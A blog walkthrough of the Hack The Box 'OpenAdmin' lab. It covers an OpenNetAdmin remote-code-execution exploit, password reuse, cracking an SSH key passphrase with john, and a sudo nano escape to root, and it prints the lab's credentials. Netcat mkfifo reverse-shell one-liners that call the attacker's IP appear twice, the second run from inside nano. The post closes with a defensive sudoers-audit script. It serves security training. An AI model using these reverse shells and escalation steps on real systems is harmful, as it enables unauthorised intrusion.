HTB OpenAdmin — Walkthrough

Vaibhav Joshi
4 min read · Jun 14, 2021

ENUMERATION

Let's start enumeration with an nmap scan:

# nmap -A 10.10.10.171
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Apache is running on port 80; visiting it shows only the Apache default page, with no useful information.

Next, directory brute forcing with dirsearch:

# python3 dirsearch.py -u http://10.10.10.171/ -e / -t 50
Extensions: / | HTTP method: get | Threads: 50 | Wordlist size: 6122
Target: http://10.10.10.171/
[07:40:24] Starting:
[07:40:30] 200 - 11KB - /
[07:40:53] 200 - 11KB - /index.html
[07:40:57] 301 - 312B - /music -> http://10.10.10.171/music/
Task Completed

Visiting /music shows a site with plenty of functionality, but after trying all of it nothing interesting turned up. Clicking Login, however, redirected to /ona/,

where the application identifies itself as OpenNetAdmin 18.1.1, a version with a known remote code execution vulnerability.

Initial Shell

The exploit I used is here

# python3 exploit.py exploit http://10.10.10.171/ona/

To get a reverse shell I used netcat:

# nc -vlp 443 // on the attacker machine
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.196 443 >/tmp/f // on the OpenAdmin machine

Privilege Escalation — jimmy

After some searching on Google I found that OpenNetAdmin stores its database credentials in plaintext in /opt/ona/www/local/config/database_settings.inc.php:

ona_sys : n1nj4W4rri0R!

Nothing interesting turned up inside the database. In /home, however, there are two users, jimmy and joanna, so I tried the database password against them in case it had been reused for a user account.

It turned out the same password is used for the jimmy account:

jimmy : n1nj4W4rri0R!

Privilege Escalation — joanna

While enumerating as www-data I found a directory, /var/www/internal, that www-data cannot access but jimmy can (through the internal group):

drwxrwx---  2 jimmy    internal 4096 Nov 23 17:43 internal

Inside it there are three files:

-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php

The content of main.php looks interesting, and like the way to the user joanna:

# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

This looks like a web application, but it was not found during web enumeration and nothing related to it is served on port 80, so I checked whether any additional port was open.

Port 52846 turned out to be open only internally, bound to localhost, so I accessed main.php on it with curl:

$ curl -s localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
...-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

This reveals the private key for joanna, but it is passphrase-protected, so I cracked the passphrase with john:

// Converting the key to hash to crack the passphrase
# python3 /usr/share/john/ssh2john.py joanna-ssh > hash
// Brute force the passphrase with rockyou.txt
# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna-ssh)

Session completed

The passphrase is bloodninjas, and with it I logged in using the SSH key:

# ssh joanna@10.10.10.171 -i joanna-ssh 
Enter passphrase for key 'joanna-ssh':bloodninjas

user.txt = c9b2cf07d********af62660f0c81b5f

Privilege Escalation — root

This one was pretty straightforward. Checking joanna's sudo permissions showed:

(ALL) NOPASSWD: /bin/nano /opt/priv

To read root.txt:

$ sudo /bin/nano /opt/priv
ctrl + R // Read file option in nano
/root/root.txt // In the field where nano asks for a file name

To get a root shell:

$ sudo /bin/nano /opt/priv
ctrl + R // Read file option in nano
ctrl + X // Execute command option in nano
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.196 443 >/tmp/f // In the field where nano asks for a command
# nc -lvp 443 // On the attacker machine

root.txt = 2f907ed450b3********4e8795d5b561
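One defensive check this root step suggests, as an added example that is not part of the walkthrough: a small Python audit of sudoers-style rules that flags NOPASSWD entries handing out binaries with shell-escape features (nano among them), wildcard arguments, or ALL. The sample rules and the binary list are constructed assumptions, written to mirror the (ALL) NOPASSWD: /bin/nano /opt/priv finding.

```python
import re

# Binaries whose interactive features can run arbitrary commands (assumed list).
SHELL_ESCAPE_BINARIES = {
    "/bin/nano", "/usr/bin/nano", "/usr/bin/vim", "/usr/bin/vi",
    "/usr/bin/less", "/usr/bin/more", "/bin/sh", "/bin/bash",
}

# user host=(runas) TAG: cmd, cmd   (Defaults lines and comments are skipped)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample; the joanna line mirrors the finding on the box.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
backup  ALL=(root) /usr/bin/rsync -a /srv/ /mnt/backup/
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app.service
"""


def audit_sudoers(text):
    """Return one finding per command spec that grants more than it appears to."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for spec in filter(None, (s.strip() for s in m.group("cmds").split(","))):
            binary = spec.split()[0]
            reasons = []
            if spec == "ALL":
                reasons.append("any command")
            if binary in SHELL_ESCAPE_BINARIES:
                reasons.append("shell escape via " + binary)
            if "*" in spec:
                reasons.append("wildcard argument")
            if reasons and nopasswd:
                reasons.append("no password required")
            if reasons:
                findings.append({"user": m.group("user"), "command": spec, "reasons": reasons})
    return findings
```

The usual fix for an editor rule like joanna's is to grant sudoedit on the file instead, which edits a temporary copy as the invoking user and never runs the editor as root.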
